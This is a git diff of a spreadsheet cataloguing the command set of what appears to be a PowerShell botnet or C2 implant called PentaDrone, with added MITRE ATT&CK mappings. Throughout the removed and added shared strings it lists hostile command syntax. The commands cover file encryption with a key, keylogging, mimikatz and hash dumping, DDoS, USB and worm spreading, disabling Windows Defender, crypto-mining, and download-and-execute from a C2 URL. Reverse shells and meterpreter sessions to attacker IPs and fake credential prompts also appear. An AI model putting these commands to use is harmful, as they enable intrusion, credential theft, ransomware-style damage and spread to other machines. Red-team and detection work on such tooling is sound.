--- a/DB/validate-cmd.xlsx
+++ b/DB/validate-cmd.xlsx
@@ -1,24 +1,25 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="4" rupBuild="21328"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="4" rupBuild="23901"/>
   <workbookPr codeName="ThisWorkbook" defaultThemeVersion="124226"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\sharelab\pnt\PentaDrone\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\sharelab\pnt\PentaDrone\DB\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BC39291C-AD3F-4EC2-AD51-B0AE16929234}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{EF386234-29F0-42A5-B0D5-2F1D8F56AA2A}" xr6:coauthVersionLast="46" xr6:coauthVersionMax="46" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="11685" yWindow="3390" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="28680" yWindow="-120" windowWidth="24240" windowHeight="13740" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Cmde state validation" sheetId="1" r:id="rId1"/>
     <sheet name="Exec validation" sheetId="4" r:id="rId2"/>
-    <sheet name="Feuil3" sheetId="3" r:id="rId3"/>
+    <sheet name="cat" sheetId="3" r:id="rId3"/>
+    <sheet name="cmd" sheetId="5" r:id="rId4"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$103</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$F$111</definedName>
     <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Exec validation'!$A$1:$B$81</definedName>
   </definedNames>
   <calcPr calcId="125725"/>
@@ -31,7 +32,7 @@
     <author>bny</author>
   </authors>
   <commentList>
-    <comment ref="D32" authorId="0" shapeId="0" xr:uid="{B0567CD3-6969-4F34-AEE1-B0F42D482B22}">
+    <comment ref="E32" authorId="0" shapeId="0" xr:uid="{B0567CD3-6969-4F34-AEE1-B0F42D482B22}">
       <text>
         <r>
           <rPr>
@@ -55,7 +56,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="D38" authorId="0" shapeId="0" xr:uid="{62BCF402-F320-4949-9A9F-B33F1F1B6200}">
+    <comment ref="E38" authorId="0" shapeId="0" xr:uid="{62BCF402-F320-4949-9A9F-B33F1F1B6200}">
       <text>
         <r>
           <rPr>
@@ -79,7 +80,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="D39" authorId="0" shapeId="0" xr:uid="{FFA2E4E1-E801-40EE-8407-109DB2AC3924}">
+    <comment ref="E39" authorId="0" shapeId="0" xr:uid="{FFA2E4E1-E801-40EE-8407-109DB2AC3924}">
       <text>
         <r>
           <rPr>
@@ -103,7 +104,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="D48" authorId="0" shapeId="0" xr:uid="{8C9F27DF-3FDF-4050-AEA5-8577532E4546}">
+    <comment ref="E48" authorId="0" shapeId="0" xr:uid="{8C9F27DF-3FDF-4050-AEA5-8577532E4546}">
       <text>
         <r>
           <rPr>
@@ -127,7 +128,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="D62" authorId="0" shapeId="0" xr:uid="{FA651B46-869B-4A96-A517-8F3953220B8F}">
+    <comment ref="E62" authorId="0" shapeId="0" xr:uid="{FA651B46-869B-4A96-A517-8F3953220B8F}">
       <text>
         <r>
           <rPr>
@@ -151,7 +152,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="D75" authorId="0" shapeId="0" xr:uid="{08F10ECF-CFF8-4560-B3EE-420B181815DA}">
+    <comment ref="E75" authorId="0" shapeId="0" xr:uid="{08F10ECF-CFF8-4560-B3EE-420B181815DA}">
       <text>
         <r>
           <rPr>
@@ -358,116 +359,14 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="483" uniqueCount="269">
-  <si>
-    <t xml:space="preserve">  #  !quit   -     Delete all artifacts and clean computer. The end of operations</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !speak|you have been, hacked.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !outlook        - List all pst archives</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !download|http://tools.hackarmoury.com/general_tools/nc/nc.exe|c:\windows\temp\svchost.exe</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !meterpreter|10.0.0.23|443</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !eicar      -    Triggering AV alarm</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !popup|Administrative credentials are needed to install a pending update. You will be prompted shortly.|UPDATE PENDING</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !migrate     - Inject shellcode into the process ID (default = explorer) of your choosing or within the context of the running PowerShell process.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !ntlmspoof   - Use inveigh to peform Spoofing attack and capture various password (SMB, NTLM, HTTP, WPAD ...)</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !webinject   - Use interceptor.ps1 to inject html content in every web request </t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !wallpaper|http://wallpapercave.com/wp/ky43p3I.jpg/|c:\windows\temp\1.jpg</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !jsrat|192.168.10.96     # Handle connexion with: powershell.exe -Exe Bypass -File c:\test\JSRat.ps1  &amp; change listening IP ADDRESS in jsrat file</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !keylog</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !mimikatz</t>
-  </si>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="922" uniqueCount="346">
   <si>
     <t xml:space="preserve"> !clearevent</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !macattrib|C:\secret.txt|01/03/2006 12:12 pm</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !decrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\</t>
-  </si>
-  <si>
     <t>Param 2 MUST ALWAYS END WITH "\"</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !bypassuac|powershell -exe bypass -win hidden -enc YwBhAGwAYwA=       - Bypass UAC and execute command in a privileged context.</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> #  !zip|C:\users\public\documents\|C:\users\secret.zip</t>
-  </si>
-  <si>
-    <t>#  !beef|iexplore.exe|http://192.168.3.40:3000/demos/basic.html   Param 2 can be: firefox.exe/ opera.exe/ chrome.exe/ iexplore.exe</t>
-  </si>
-  <si>
-    <t xml:space="preserve">#  !shellcode|@(0x90,0x90,0xC3)   -  Inject the specifyed shellcode. msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- </t>
-  </si>
-  <si>
-    <t>#  !update --    Update c2c and every others usefull stuff</t>
-  </si>
-  <si>
-    <t>#  !hotpotatoes|net user tater Winter2016 /add &amp;&amp; net localgroup administrators tater /add</t>
-  </si>
-  <si>
-    <t>#  !webcam</t>
-  </si>
-  <si>
-    <t>#  !screenshot</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !vnc|bind||5900|pass1234   OR  §vnc|reverse|IP_of_attacker|5500|pass1234</t>
-  </si>
-  <si>
-    <t>#  !encrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\      Param 2 MUST ALWAYS END WITH "\"    - encrypt all "doc,docx,xlx,xlsx,ppt,pptx,jpg,png,bmp,pdf,txt,log,mp3,avi,mpeg,mp4" files</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !bitcoin   # Bitcoin mining, enslave the bot ;-)</t>
-  </si>
-  <si>
-    <t>#  !dnsspoof|127.0.0.1  facebook.com|0/1  --&gt; 1 =&gt; add, 0 =&gt; clean &amp; add</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !ddos|http://target.com</t>
-  </si>
-  <si>
-    <t>#  !destroy the system</t>
-  </si>
-  <si>
-    <t>#  !sendmail|target@corp.com|subject|Hello Im your friend|c:\evil.pdf    -  Send email from the compromised system</t>
-  </si>
-  <si>
-    <t>#  !browserdump</t>
-  </si>
-  <si>
-    <t>#  !remotemimikatz</t>
-  </si>
-  <si>
-    <t>#  !extractlog|system</t>
-  </si>
-  <si>
     <t>Cat</t>
   </si>
   <si>
@@ -543,9 +442,6 @@
     <t>Syntaxe</t>
   </si>
   <si>
-    <t>Recon</t>
-  </si>
-  <si>
     <t>Persistence</t>
   </si>
   <si>
@@ -570,54 +466,21 @@
     <t>Exfiltration</t>
   </si>
   <si>
-    <t>Command Control</t>
-  </si>
-  <si>
-    <t>Delivery</t>
-  </si>
-  <si>
-    <t>Shell</t>
-  </si>
-  <si>
     <t>Management</t>
   </si>
   <si>
-    <t>Trolling</t>
-  </si>
-  <si>
     <t>Privilege Escalation</t>
   </si>
   <si>
-    <t xml:space="preserve">#  !exfiltrate|doc|C:\users\    </t>
-  </si>
-  <si>
-    <t xml:space="preserve"> #  !exfilfile|C:\users\secret.zip</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !sleeps|10|60|90</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> #  !privesc</t>
-  </si>
-  <si>
-    <t>#  !adduser|johndoe|p@s5w0rd|domain</t>
-  </si>
-  <si>
     <t>!procdump</t>
   </si>
   <si>
     <t>!firewall</t>
   </si>
   <si>
-    <t># !procdump    -  dump process - usefull to use offline mimikatz</t>
-  </si>
-  <si>
     <t>!http</t>
   </si>
   <si>
-    <t># !phish|facebook.com|http://xxxxx.ngrok.io/facebook</t>
-  </si>
-  <si>
     <t>!reverseshell</t>
   </si>
   <si>
@@ -627,21 +490,12 @@
     <t>!httprat</t>
   </si>
   <si>
-    <t># !reverseshell|attackerIP|AttackerPort</t>
-  </si>
-  <si>
-    <t># !httprat|212.74.21.23  OR  !httprat|xxxxxx.ngrok.io   (without HTTP/s)</t>
-  </si>
-  <si>
     <t>!enumsession</t>
   </si>
   <si>
     <t>!explorer</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !hashdump</t>
-  </si>
-  <si>
     <t>!sherlock -  Detect Privesc vulns</t>
   </si>
   <si>
@@ -654,12 +508,6 @@
     <t>!bits</t>
   </si>
   <si>
-    <t xml:space="preserve">#!explorer|1|  &gt;only list share -   !explorer|0|C:\users  &gt;only list specified local folder  -  !explorer|1|C:\users  &gt;list shares and specified local folder </t>
-  </si>
-  <si>
-    <t>#  !thunder|http://www.youtube.com/watch?v=v2AC41dglnM</t>
-  </si>
-  <si>
     <t>!thunder</t>
   </si>
   <si>
@@ -753,30 +601,12 @@
     <t>!checkwmi</t>
   </si>
   <si>
-    <t>#  !usbspread|on|YwBhAGwAYwA=     - Infect USB with malicious lnk</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> #  !psexec|domain\admin|password|192.168.3.202|powershell.exe 'calc.exe'    - download psexec, use credential and push bot in targeted ip </t>
-  </si>
-  <si>
-    <t xml:space="preserve"> # !ngrok|AUTHKEYAUTHKEY|http|80   - Expose zombie(TCP/IP) PC to Internet so that you can connect any tools</t>
-  </si>
-  <si>
-    <t>#  !pivot     - download psexec, use credential and push bot in every ip in the LAN</t>
-  </si>
-  <si>
     <t xml:space="preserve">!wshell </t>
   </si>
   <si>
-    <t xml:space="preserve"> #  !wshell|8080  -  use it with !tunnel to expose localhost port 8080 over Internet</t>
-  </si>
-  <si>
     <t xml:space="preserve">!rdp            </t>
   </si>
   <si>
-    <t xml:space="preserve"> !rdp</t>
-  </si>
-  <si>
     <t>ANNULE</t>
   </si>
   <si>
@@ -789,18 +619,6 @@
     <t>!dropboxc2</t>
   </si>
   <si>
-    <t xml:space="preserve">  # !persist|reg / startup / task / wmi / all |Custom_command</t>
-  </si>
-  <si>
-    <t># !streaming|on / off - take screenshot at every hello (active spy)</t>
-  </si>
-  <si>
-    <t>#  !choco  - install Choco and some usefull plug</t>
-  </si>
-  <si>
-    <t>#  !pshupgrade  --  upgrade powershell version</t>
-  </si>
-  <si>
     <t xml:space="preserve">!pthsmb      </t>
   </si>
   <si>
@@ -828,9 +646,6 @@
     <t>!browserdump</t>
   </si>
   <si>
-    <t xml:space="preserve">#!backdoorlnk </t>
-  </si>
-  <si>
     <t>!bypassuac</t>
   </si>
   <si>
@@ -843,12 +658,6 @@
     <t xml:space="preserve">!sendmail </t>
   </si>
   <si>
-    <t xml:space="preserve">#!destroy </t>
-  </si>
-  <si>
-    <t xml:space="preserve">#!ddos          </t>
-  </si>
-  <si>
     <t xml:space="preserve">!dnsspoof       </t>
   </si>
   <si>
@@ -933,9 +742,6 @@
     <t xml:space="preserve">!privesc </t>
   </si>
   <si>
-    <t xml:space="preserve"> !persist </t>
-  </si>
-  <si>
     <t xml:space="preserve">!popup </t>
   </si>
   <si>
@@ -996,48 +802,21 @@
     <t>Validate CMD</t>
   </si>
   <si>
-    <t xml:space="preserve"> # !aptget|php OR !aptget|python2 OR !aptget|curl OR !aptget|wget - install package linux-like using CHOCOLATEY. You  must first run !choco</t>
-  </si>
-  <si>
     <t>!windefkill</t>
   </si>
   <si>
     <t>!extractkey</t>
   </si>
   <si>
-    <t># !url|iexplore.exe|on / off|http://www.youtube.com/watch?v=dQw4w9WgXcQ</t>
-  </si>
-  <si>
-    <t>#  !windefkill   OR !windefkill|10.10.10.2   -  Kill Windows Defender locally or remotely</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !worm|login|password  - another way to move laterally but in a virally way</t>
-  </si>
-  <si>
     <t>!geolocate</t>
   </si>
   <si>
     <t xml:space="preserve">!wcry     </t>
   </si>
   <si>
-    <t xml:space="preserve">!scan </t>
-  </si>
-  <si>
-    <t># !checkwmi  --  Verify WMI value</t>
-  </si>
-  <si>
     <t>!acl|c:\users\toto.txt    --   Get NTFS permissions applied to a file</t>
   </si>
   <si>
-    <t xml:space="preserve"> #  !scan       -    Network port scanning like with Nmap, all over the LAN</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> #  !wcry       -    Check system against WannaCry MS17-010 vulnerability</t>
-  </si>
-  <si>
-    <t>#  !credential  -  Try to Phish windows credentials and test it before storing it</t>
-  </si>
-  <si>
     <t>!nc</t>
   </si>
   <si>
@@ -1080,102 +859,15 @@
     <t>!wificreds|SSID_NAME - Extract stored WIFI credentials</t>
   </si>
   <si>
-    <r>
-      <t xml:space="preserve">  #  !run|2|echo bonjour  -  !run|1|calc   - !run|0|net localgroup adminstrators  # </t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="11"/>
-        <color rgb="FFFF0000"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>1</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="11"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">= yes run in job    </t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="11"/>
-        <color rgb="FFFF0000"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>0</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="11"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">= no job ,    </t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="11"/>
-        <color rgb="FFFF0000"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> </t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="11"/>
-        <color rgb="FFFF0000"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>2</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="11"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>= no job &amp; upload results in txt</t>
-    </r>
-  </si>
-  <si>
-    <t>#!downexec|ps1/exe|http://url.com/file|file -  example !downexec|ps1|http://script.com/Invoke-DBC2.ps1 |Invoke-DBC2 -Arguments    OR !downexec|exe|http://script.com/bin.exe |-i user -c pc</t>
-  </si>
-  <si>
     <t>!logbypass    -   Invoke-phant0m  invisible mode activated against eventviewer</t>
   </si>
   <si>
-    <t>#!enumsession|toto|F8580EAGFH89725 - Enumarate sessions, need HASH</t>
-  </si>
-  <si>
     <t>!whoami - Display the current session user</t>
   </si>
   <si>
     <t>!getpid|lsass -- Get the PID of a process</t>
   </si>
   <si>
-    <t>#!firewall|on / off|8080   - Desactivate or activate firewall and also specify a port to open in and out</t>
-  </si>
-  <si>
     <t>!webhistory</t>
   </si>
   <si>
@@ -1194,21 +886,6 @@
     <t>!extractkey OR remotely: !extractkey|domain\admin|password  - Quietly digging up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP</t>
   </si>
   <si>
-    <t># !http|8080  -  setup local http server and host a page (Efficient if used with DNSSPOOF: you setup phishing page and you host redir.html To redirect local victim to your phishing page</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !sniff|10  - Capture TCP/IP packet - Open with Microsoft Message Analyzer</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !hello   - Ping C2 server</t>
-  </si>
-  <si>
-    <t xml:space="preserve">  #  !changec2|http:\newc2cserver.com  -  switch C2 server</t>
-  </si>
-  <si>
-    <t># !runas|IEX(New-Object Net.WebClient).DownloadString("http://c2/link/pnt.ps1"))</t>
-  </si>
-  <si>
     <t>!runas</t>
   </si>
   <si>
@@ -1224,29 +901,509 @@
     <t xml:space="preserve">!pilot|http://127.0.0.1/www/link/pilot.xml - Used to give a schema to zombies so that they will autopilot. How: they process the .xml file instructions, create and send to C2 the list of pré-formatted commands that they will execute </t>
   </si>
   <si>
-    <t>#  !pthwmi - Pass the hash using WMI</t>
-  </si>
-  <si>
-    <t>#  !pthsmb  - Pass the hash using SMB</t>
-  </si>
-  <si>
     <t>work only with ps greater than 3</t>
   </si>
   <si>
     <t>!smbenum</t>
   </si>
   <si>
-    <t>#!!smbenum|toto|F8580EAGFH89725  -Enumarate Group,Sessions,Users,shares, need HASH</t>
-  </si>
-  <si>
     <t>but need bypassUAC to be efficient</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !chromeextension|bhpijbhnnpcobofdieiocbphkdjjbef</t>
+  </si>
+  <si>
+    <t>!chromeextension</t>
+  </si>
+  <si>
+    <t>!firefoxextension</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !firefoxextension|http://xxxx/ext.xpi</t>
+  </si>
+  <si>
+    <t>mitre</t>
+  </si>
+  <si>
+    <t>T1595.001</t>
+  </si>
+  <si>
+    <t>!vulnscan</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!nmap </t>
+  </si>
+  <si>
+    <t>!vulnscan   -    Vulnerabilities scanning like with Nessus (only local)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !nmap       -    Network port scanning like with Nmap, all over the LAN</t>
+  </si>
+  <si>
+    <t xml:space="preserve">  !wcry       -    Check system against WannaCry MS17-010 vulnerability</t>
+  </si>
+  <si>
+    <t>!arpspoof - Run MAC spoofing attack (MITM)</t>
+  </si>
+  <si>
+    <t>!arpspoof</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !arp  -  ping all the IP scope and return resulting arp cache (arp -a)</t>
+  </si>
+  <si>
+    <t>!arp</t>
+  </si>
+  <si>
+    <t>T1557.002</t>
+  </si>
+  <si>
+    <t>T1113</t>
+  </si>
+  <si>
+    <t>T1125</t>
+  </si>
+  <si>
+    <t>T1056.001</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !browserdump  --  Dump browser passwords accounts</t>
+  </si>
+  <si>
+    <t>T1555.003</t>
+  </si>
+  <si>
+    <t>T1114.001</t>
+  </si>
+  <si>
+    <t>T1560.001</t>
+  </si>
+  <si>
+    <t>T1567.002</t>
+  </si>
+  <si>
+    <t>T1041</t>
+  </si>
+  <si>
+    <t>Impact</t>
+  </si>
+  <si>
+    <t>T1083</t>
+  </si>
+  <si>
+    <t>T1033</t>
+  </si>
+  <si>
+    <t>T1217</t>
+  </si>
+  <si>
+    <t>T1057</t>
+  </si>
+  <si>
+    <t>!ps - list all running process</t>
+  </si>
+  <si>
+    <t>!ps</t>
+  </si>
+  <si>
+    <t>T1135</t>
+  </si>
+  <si>
+    <t>T1081.001, T1087.002</t>
+  </si>
+  <si>
+    <t xml:space="preserve">T1081.001, T1087.002, T1087.003, T1087.004, T1010, T1135, T1120, T1069.001, T1012, T1082, T1016, T1049 </t>
+  </si>
+  <si>
+    <t>!netstat</t>
+  </si>
+  <si>
+    <t>!netstat - show open connexions</t>
+  </si>
+  <si>
+    <t>T1049</t>
+  </si>
+  <si>
+    <t>T1185, T1176</t>
+  </si>
+  <si>
+    <t>T1547.001, T1053.005, T1546.003</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!persist </t>
+  </si>
+  <si>
+    <t>T1134.004, T1548.004</t>
+  </si>
+  <si>
+    <t>T1134.001, T1134.002, T1134003</t>
+  </si>
+  <si>
+    <t>T1548.004</t>
+  </si>
+  <si>
+    <t>T1136.001</t>
+  </si>
+  <si>
+    <t>T1548.002</t>
+  </si>
+  <si>
+    <t>!amsibypass</t>
+  </si>
+  <si>
+    <t>!privesc - Check local privesc vulnerabilities (sherlock  &amp; powerUp)</t>
+  </si>
+  <si>
+    <t>T1595.002, T1068</t>
+  </si>
+  <si>
+    <t>T1040</t>
+  </si>
+  <si>
+    <t>T1534</t>
+  </si>
+  <si>
+    <t>T1056.002</t>
+  </si>
+  <si>
+    <t>T1555, T1003.001, T1003.002, T1003.003, T1003.004, T1003.006, T1558.001, T1558.002, T1550.002, T1550.003</t>
+  </si>
+  <si>
+    <t>T1550.002</t>
+  </si>
+  <si>
+    <t>T1021.001</t>
+  </si>
+  <si>
+    <t>T1021.005</t>
+  </si>
+  <si>
+    <t>T1570, T1021.002, T1569.002</t>
+  </si>
+  <si>
+    <t>!rdp  -  Activate and start RDP service (expose it with ngrok and connect via Internet)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !quit   -     Delete all artifacts and clean computer. The end of operations</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !hello   - Ping C2 server</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !changec2|http:\newc2cserver.com  -  switch C2 server</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !speak|you have been, hacked.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !run|0|echo bonjour  -  !run|1|calc   - !run|2|net localgroup adminstrators1= yes run in job    0= no job ,     2= no job &amp; upload results in txt</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !download|http://tools.hackarmoury.com/general_tools/nc/nc.exe|c:\windows\temp\svchost.exe</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !meterpreter|10.0.0.23|443</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !sleeps|10|60|90</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !eicar      -    Triggering AV alarm</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !popup|Administrative credentials are needed to install a pending update. You will be prompted shortly.|UPDATE PENDING</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !ntlmspoof   - Use inveigh to peform Spoofing attack and capture various password (SMB, NTLM, HTTP, WPAD ...)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !webinject   - Use interceptor.ps1 to inject html content in every web request </t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !wallpaper|http://wallpapercave.com/wp/ky43p3I.jpg/|c:\windows\temp\1.jpg</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !jsrat|192.168.10.96   Handle connexion with: powershell.exe -Exe Bypass -File c:\test\JSRat.ps1  &amp; change listening IP ADDRESS in jsrat file</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !vnc|bind||5900|pass1234   OR  §vnc|reverse|IP_of_attacker|5500|pass1234</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !keylog</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !hashdump</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !mimikatz</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !macattrib|C:\secret.txt|01/03/2006 12:12 pm</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !decrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !bitcoin Bitcoin mining, enslave the bot ;-)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !ddos|http://target.com</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !bypassuac|powershell -exe bypass -win hidden -enc YwBhAGwAYwA=       - Bypass UAC and execute command in a privileged context.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !sniff|10  - Capture TCP/IP packet - Open with Microsoft Message Analyzer</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !worm|login|password  - another way to move laterally but in a virally way</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !migrate     - Inject shellcode into the process ID (default = explorer) of your choosing or within the context of the running PowerShell process.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !exfilfile|C:\users\secret.zip</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !zip|C:\users\public\documents\|C:\users\secret.zip</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !outlook        - List all pst archives</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !psexec|domain\admin|password|192.168.3.202|powershell.exe 'calc.exe'    - download psexec, use credential and push bot in targeted ip </t>
+  </si>
+  <si>
+    <t>!ngrok|AUTHKEYAUTHKEY|http|80   - Expose zombie(TCP/IP) PC to Internet so that you can connect any tools</t>
+  </si>
+  <si>
+    <t>!persist|reg / startup / task / wmi / all |Custom_command</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !wshell|8080  -  use it with !tunnel to expose localhost port 8080 over Internet</t>
+  </si>
+  <si>
+    <t>!aptget|php OR !aptget|python2 OR !aptget|curl OR !aptget|wget - install package linux-like using CHOCOLATEY. You  must first run !choco</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !beef|iexplore.exe|http://192.168.3.40:3000/demos/basic.html   Param 2 can be: firefox.exe/ opera.exe/ chrome.exe/ iexplore.exe</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !update --    Update c2c and every others usefull stuff</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !exfiltrate|doc|C:\users\    </t>
+  </si>
+  <si>
+    <t>!url|iexplore.exe|on / off|http://www.youtube.com/watch?v=dQw4w9WgXcQ</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !thunder|http://www.youtube.com/watch?v=v2AC41dglnM</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !pivot     - download psexec, use credential and push bot in every ip in the LAN</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !pthsmb  - Pass the hash using SMB</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !pthwmi - Pass the hash using WMI</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !shellcode|@(0x90,0x90,0xC3)   -  Inject the specifyed shellcode. msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- </t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !usbspread|on|YwBhAGwAYwA=     - Infect USB with malicious lnk</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !webcam</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !screenshot</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !credential  -  Try to Phish windows credentials and test it before storing it</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !remotemimikatz</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !extractlog|system</t>
+  </si>
+  <si>
